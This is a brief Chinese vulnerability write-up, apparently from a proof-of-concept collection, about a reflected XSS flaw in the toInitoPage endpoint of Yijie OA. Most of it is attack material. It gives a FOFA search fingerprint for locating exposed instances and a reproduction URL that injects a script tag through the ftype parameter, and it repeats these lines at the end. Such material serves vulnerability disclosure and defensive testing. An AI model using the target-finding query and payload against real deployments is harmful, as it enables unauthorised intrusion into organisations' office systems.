易捷OA toInitoPage存在xss漏洞
一、漏洞简介
易捷OA toInitoPage存在xss漏洞
二、影响版本
- 易捷OA
三、资产测绘
- fofa
body="/images/logon/yij.png"
- 特征
四、漏洞复现
/documentsend.t?op=toInitoPage&fname=&ftype="/><script>alert("XSS")</script>
易捷OA toInitoPage存在xss漏洞
body="/images/logon/yij.png"
/documentsend.t?op=toInitoPage&fname=&ftype="/><script>alert("XSS")</script>